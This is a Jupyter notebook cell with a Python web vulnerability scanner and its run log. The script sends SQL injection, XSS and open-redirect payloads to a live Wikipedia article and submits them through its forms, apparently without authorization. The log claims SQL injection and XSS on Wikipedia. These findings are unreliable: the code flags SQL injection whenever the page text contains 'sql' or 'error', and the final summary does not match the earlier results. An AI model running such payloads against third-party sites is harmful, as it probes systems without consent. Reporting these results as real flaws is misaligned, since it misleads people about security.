In [3]:
import requests
from bs4 import BeautifulSoup
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas
from datetime import datetime
from urllib.parse import urljoin

# Configuration
TARGET_URL = "https://en.wikipedia.org/wiki/Donald_Trump"  # URL to scan

# Payloads for different types of attacks
SQL_PAYLOADS = ["'", '"', " OR 1=1 --", " OR '1'='1' --", "' UNION SELECT NULL, NULL --"]
XSS_PAYLOADS = ["<script>alert('XSS')</script>", '" onmouseover="alert(1)"']
REDIRECT_PAYLOADS = ["http://google.com", "//google.com"]

def generate_pdf_report(vulnerabilities):
    """
    Generates a PDF report of the detected vulnerabilities.
    """
    report_name = f"Vulnerability_Report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.pdf"
    c = canvas.Canvas(report_name, pagesize=letter)
    c.drawString(30, 750, "Vulnerability Detection Report")
    c.drawString(30, 730, f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    c.drawString(30, 700, "Detected Vulnerabilities:")

    y = 680
    for vuln in vulnerabilities:
        c.drawString(50, y, f"- {vuln}")
        y -= 20

    c.save()
    print(f"PDF report generated: {report_name}")

def scan_insecure_cookies(response):
    """
    Checks for insecure cookie configurations.
    """
    print("Checking for Insecure Cookies...")
    found_vulnerabilities = []
    cookies = response.cookies

    for cookie in cookies:
        if not cookie.secure:
            vulnerability = f"Insecure Cookie: '{cookie.name}' is missing the 'Secure' flag."
            print(vulnerability)
            found_vulnerabilities.append(vulnerability)
        if 'httponly' not in cookie._rest: # A simple way to check if HttpOnly is missing
            vulnerability = f"Insecure Cookie: '{cookie.name}' is missing the 'HttpOnly' flag."
            print(vulnerability)
            found_vulnerabilities.append(vulnerability)
    
    return found_vulnerabilities

def scan_sql_injection(url):
    """
    Scans the target URL for SQL Injection vulnerabilities.
    """
    print("Scanning for SQL Injection...")
    found_vulnerabilities = []

    for payload in SQL_PAYLOADS:
        # Note: This is a basic test assuming a parameter named 'id' exists.
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url, timeout=5)
            if "error" in response.text.lower() or "sql" in response.text.lower():
                vulnerability = f"SQL Injection found with payload: {payload}"
                print(vulnerability)
                found_vulnerabilities.append(vulnerability)
        except requests.exceptions.RequestException:
            continue

    return found_vulnerabilities

def scan_xss(url):
    """
    Scans the target URL for Cross-Site Scripting (XSS) vulnerabilities.
    """
    print("Scanning for XSS...")
    found_vulnerabilities = []
    try:
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.text, "html.parser")
        forms = soup.find_all("form")

        for form in forms:
            for payload in XSS_PAYLOADS:
                inputs = form.find_all("input")
                data = {inp.get("name"): payload for inp in inputs if inp.get("name")}
                action = form.get("action")
                form_url = urljoin(url, action)
                
                try:
                    # Submitting the form with the XSS payload
                    post_response = requests.post(form_url, data=data, timeout=5)
                    if payload in post_response.text:
                        vulnerability = f"XSS found in form (action='{action}') with payload: {payload}"
                        print(vulnerability)
                        found_vulnerabilities.append(vulnerability)
                except requests.exceptions.RequestException:
                    continue
    except requests.exceptions.RequestException as e:
        print(f"Could not scan for XSS: {e}")

    return found_vulnerabilities

def scan_open_redirect(url):
    """
    Scans for open redirect vulnerabilities.
    """
    print("Scanning for Open Redirect...")
    found_vulnerabilities = []
    
    for payload in REDIRECT_PAYLOADS:
        # Note: This is a basic test assuming a parameter named 'next' exists.
        test_url = f"{url}?next={payload}"
        try:
            response = requests.get(test_url, allow_redirects=False, timeout=5)
            if response.status_code in [301, 302, 303, 307, 308] and payload in response.headers.get("Location", ""):
                vulnerability = f"Open Redirect found with payload: {payload}"
                print(vulnerability)
                found_vulnerabilities.append(vulnerability)
        except requests.exceptions.RequestException:
            continue
            
    return found_vulnerabilities

def main():
    """
    Main function to run all vulnerability scans and generate a report.
    """
    print(f"Starting scan on {TARGET_URL}\n")
    vulnerabilities = []
    try:
        response = requests.get(TARGET_URL, timeout=10)

        # Run all vulnerability scans
        vulnerabilities += scan_insecure_cookies(response)
        vulnerabilities += scan_sql_injection(TARGET_URL)
        vulnerabilities += scan_xss(TARGET_URL)
        vulnerabilities += scan_open_redirect(TARGET_URL)

        # Generate Report
        if vulnerabilities:
            print("\nScan Complete. Vulnerabilities Found:")
            for v in vulnerabilities:
                print(f"- {v}")
            generate_pdf_report(vulnerabilities)
        else:
            print("\nScan Complete. No vulnerabilities detected.")

    except requests.exceptions.RequestException as e:
        print(f"Could not connect to the target URL. Error: {e}")

if __name__ == "__main__":
    main()

Starting scan on https://en.wikipedia.org/wiki/Donald_Trump

Checking for Insecure Cookies...
Insecure Cookie: 'WMF-Last-Access' is missing the 'HttpOnly' flag.
Insecure Cookie: 'NetworkProbeLimit' is missing the 'HttpOnly' flag.
Insecure Cookie: 'WMF-Last-Access-Global' is missing the 'HttpOnly' flag.
Insecure Cookie: 'GeoIP' is missing the 'HttpOnly' flag.
Insecure Cookie: 'WMF-Uniq' is missing the 'HttpOnly' flag.
Scanning for SQL Injection...
SQL Injection found with payload: '
SQL Injection found with payload: "
SQL Injection found with payload:  OR 1=1 --
SQL Injection found with payload:  OR '1'='1' --
SQL Injection found with payload: ' UNION SELECT NULL, NULL --
Scanning for XSS...
XSS found in form (action='/w/index.php') with payload: " onmouseover="alert(1)"
XSS found in form (action='/w/index.php') with payload: " onmouseover="alert(1)"
Scanning for Open Redirect...

Scan Complete. Vulnerabilities Found:
- Insecure Cookie: 'WMF-Last-Access' is missing the 'HttpOnly' flag.
